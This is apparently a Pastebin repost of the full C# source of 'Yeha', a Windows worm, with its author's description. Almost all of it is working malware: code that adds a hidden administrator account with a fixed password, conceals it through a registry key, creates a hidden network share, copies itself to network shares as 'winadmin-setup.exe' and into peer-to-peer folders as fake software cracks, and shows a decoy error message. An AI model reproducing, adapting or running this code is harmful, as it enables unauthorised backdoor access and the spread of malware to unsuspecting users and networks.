FlyFar

P2P-Worm.MSIL.Small.e - Source Code

Jun 6th, 2023
117
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
C# 10.34 KB | Cybersecurity | 0 0
  1.    /*************************************************************
  2.     * C# - MSIL.Yeha
  3.     * >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
  4.     * by free0n
  5.     * vx13d.net free0n@vx13d.net
  6.     * ###########################################################
  7.     *
  8.     * Yeha works by first checking itself in the registry
  9.     * if it hasn't ran yet it will attempt to create a
  10.     * new hidden local admin user account named Yeha with the
  11.     * password yehawashere. After the account is created
  12.     * it creates a new network share in C:\Yeha and makes the
  13.     * directory as hidden. This is so if someone is browsing
  14.     * the network we might lure them in. Each time the exe
  15.     * is run it will spread to any open network shares that
  16.     * were found in the mru list in the registry. It copies
  17.     * as winadmin-setup.exe.
  18.     *
  19.     * After the share spreading is completed it copies itself
  20.     * to commonly shared p2p folders as cracks for programs
  21.     * found in the program files directory. For example if
  22.     * Trilian directory is found it creates a trillian-crack.exe
  23.     * once the p2p is done it will display message if the day
  24.     * is the 25th that Yeha has been here if it's not it
  25.     * displays a common windows error message.
  26.     *
  27.     * Note: This uses the same trick as Snoopy did as
  28.     * it looks like a console application but the output
  29.     * type is windows application so we don't get a dorky
  30.     * cmd window popping up when it's ran. Compiled with
  31.     * MS Visual C# express
  32.     *
  33.     * thx RRLF!
  34.     * keep vxing!
  35.     * >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
  36.     ************************************************************/
  37.    /************************************************************
  38.     * Start of Program.cs
  39.     * >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
  40.     ************************************************************/
  41.  
  42.    using System;
  43.    using System.Collections.Generic;
  44.    using System.Text;
  45.    using System.Windows.Forms;
  46.    using System.IO;
  47.  
  48.    namespace Yeha {
  49.  
  50.        class Program {
  51.  
  52.            static void Main(string[] args) {
  53.  
  54.                Yeha yeha = new Yeha();
  55.                if (!yeha.chkIt()) {
  56.                    yeha.YehaUser();
  57.                    yeha.CreateShare(@"C:\Yeha", "Yeha");
  58.                }
  59.  
  60.                yeha.Share();
  61.                yeha.p2p();
  62.  
  63.                if (DateTime.Now.Day == 25) {
  64.                    MessageBox.Show("Yeha was here!", "Yeha", MessageBoxButtons.OK, MessageBoxIcon.Information);
  65.                } else {
  66.                    MessageBox.Show("Not a valid win32 program", "Windows", MessageBoxButtons.OK, MessageBoxIcon.Error);
  67.                }
  68.            }
  69.        }
  70.    }
  71.  
  72.    /************************************************************
  73.     * Start of Yeha.cs
  74.     * >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
  75.     ************************************************************/
  76.  
  77.    using System;
  78.    using System.Text;
  79.    using System.IO;
  80.    using System.Diagnostics;
  81.    using System.DirectoryServices;
  82.    using Microsoft.Win32;
  83.    using System.Collections;
  84.    using System.Collections.Generic;
  85.    using System.Management;
  86.  
  87.    namespace Yeha {
  88.  
  89.        class Yeha {
  90.  
  91.            private string me = Convert.ToString(Process.GetCurrentProcess().MainModule.FileName);
  92.  
  93.            public bool chkIt() {
  94.                //checking the registry to see if we have already ran. If
  95.                //we aren't found in the registry we add the value.
  96.                //Hkey local machine is good real estate ;)
  97.  
  98.                string regstr = (string)Registry.GetValue(@"HKEY_LOCAL_MACHINE\SOFTWARE\Yeha", "Yeha", "Yeha");
  99.                if (regstr == "Yeha") {
  100.                    return true;
  101.                } else {
  102.                    RegistryKey key = Registry.LocalMachine.OpenSubKey("Software", true);
  103.                    RegistryKey newkey = key.CreateSubKey("Yeha");
  104.                    newkey.SetValue("Yeha", me);
  105.                    return false;
  106.                }
  107.            }
  108.  
  109.            public void p2p() {
  110.  
  111.                //our p2p spreading is basically just a list of common folders
  112.                //if the folder exists we drop a copies of ourselves as cracks
  113.                //for programs we find the program files folder
  114.  
  115.                ArrayList arSharedFolders = new ArrayList();
  116.                arSharedFolders.Add(Environment.GetFolderPath(Environment.SpecialFolder.MyDocuments) + "\\Downloads");
  117.                arSharedFolders.Add(Environment.GetFolderPath(Environment.SpecialFolder.MyDocuments) + "\\My Shared Folder");
  118.                arSharedFolders.Add(Environment.GetFolderPath(Environment.SpecialFolder.MyDocuments) + "\\Shared");
  119.                arSharedFolders.Add(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + "\\Ares\\My Shared Folder");
  120.                arSharedFolders.Add(Environment.GetFolderPath(Environment.SpecialFolder.Desktop) + "\\Downloads");
  121.                arSharedFolders.Add(Environment.GetFolderPath(Environment.SpecialFolder.ProgramFiles) + "\\Shareaza\\Downloads");
  122.  
  123.                IEnumerator folder = arSharedFolders.GetEnumerator();
  124.                while (folder.MoveNext()) {
  125.                    string tada = Convert.ToString(folder.Current);
  126.                    if (Directory.Exists(tada)) {
  127.                        string progDir = Environment.GetFolderPath(Environment.SpecialFolder.ProgramFiles);
  128.                        foreach (string d in Directory.GetDirectories(progDir)) {
  129.                            string app = tada + "\\" + d.Substring(d.LastIndexOf("\\")).Replace("\\", string.Empty) + "-crack.exe";
  130.                            File.Copy(me, app, true);
  131.                        }
  132.                    }
  133.                }
  134.            }
  135.  
  136.            public void YehaUser() {
  137.  
  138.                try {
  139.  
  140.                    //create our new admin user account on the local machine we are running on.
  141.                    DirectoryEntry ad = new DirectoryEntry("WinNT://" + Environment.MachineName + ",computer");
  142.                    DirectoryEntry usr = ad.Children.Add("Yeha", "user");
  143.                    usr.Invoke("SetPassword", new object[] { "yehawashere" });
  144.                    usr.CommitChanges();
  145.  
  146.                    DirectoryEntry de;
  147.                    de = ad.Children.Find("Administrators", "group");
  148.                    if (de != null) {
  149.                        de.Invoke("Add", new object[] { usr.Path.ToString() });
  150.                    }
  151.  
  152.                    //now we need to make the user hidden from the login screen and the
  153.                    //user accounts applet in the control panel to do this we
  154.                    //use a reg hack.
  155.  
  156.                    try {
  157.                        string rkey = @"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList";
  158.                        Registry.SetValue(rkey, "Yeha", 0, RegistryValueKind.DWord);
  159.                    } catch (Exception er) { }
  160.  
  161.                } catch (Exception ex) { }
  162.            }
  163.  
  164.            public void Share() {
  165.  
  166.                //copy ourselves to all the local network shares on the computer
  167.                //this could be good bait when someone connects and wonders what
  168.                //winadmin-setup is.
  169.  
  170.                try {
  171.                    ManagementObjectSearcher shares = new
  172.                    ManagementObjectSearcher("select * from win32_share");
  173.                    foreach (ManagementObject serv in shares.Get()) {
  174.                        string shareName = Convert.ToString(serv["Name"]);
  175.                        if (!shareName.Contains("$")) {
  176.                            File.Copy(me, @"\\" + Environment.MachineName + @"\" + shareName + @"\winadmin-setup.exe", true);
  177.                        }
  178.                    }
  179.                } catch (Exception ex) { }
  180.  
  181.                //now we need to copy ourselves to other shares
  182.                //on the network to do this we check for network shares
  183.                //in the MRU list, we may get lucky we may not
  184.  
  185.                try {
  186.                    string key = @"Software\Microsoft\Windows\CurrentVersion\Explorer\Map Network Drive MRU\";
  187.                    RegistryKey reg = Registry.CurrentUser.OpenSubKey(key); ;
  188.                    foreach (string valuename in reg.GetValueNames()) {
  189.                        string path = reg.GetValue(valuename).ToString();
  190.                        if (valuename.ToLower() != "mrulist") {
  191.                            try {
  192.                                File.Copy(me, path + @"\\winadmin-setup.exe", true);
  193.                            } catch (Exception er) {
  194.                                continue;
  195.                            }
  196.                        }
  197.                    }
  198.                    reg.Close();
  199.                } catch (Exception er) { }
  200.            }
  201.  
  202.            public void CreateShare(string dir, string name) {
  203.  
  204.                //we create our own shared folder on the network called Yeha
  205.                //this is so if we get a user browsing the network they might
  206.                //open it up and double click winadmin-setup.exe. You know a user
  207.                //might be more susceptible to pick it up if the folder was
  208.                //named pr0n or porn hehehe.
  209.  
  210.                try {
  211.                    Directory.CreateDirectory(dir);
  212.                    ManagementClass managementClass = new ManagementClass("Win32_Share");
  213.                    ManagementBaseObject inParams = managementClass.GetMethodParameters("Create");
  214.                    ManagementBaseObject outParams;
  215.                    inParams["Description"] = name;
  216.                    inParams["Name"] = name;
  217.                    inParams["Path"] = dir;
  218.                    inParams["Type"] = 0x0;
  219.                    outParams = managementClass.InvokeMethod("Create", inParams, null);
  220.  
  221.                    //if the return value was 0 then we know we got the folder created
  222.                    //so we are going to make it hidden..
  223.                    if ((uint)(outParams.Properties["ReturnValue"].Value) == 0) {
  224.                //make the dir hidden
  225.                        if (Directory.Exists(dir)) {
  226.                            DirectoryInfo d = new DirectoryInfo(dir);
  227.                            d.Attributes = FileAttributes.Hidden;
  228.                        }
  229.                    }
  230.  
  231.                } catch (Exception e) { }
  232.            }
  233.        }
  234.    }
  235.  
  236.  
  237.  
Tags: p2p worm
Add Comment
Please, Sign In to add comment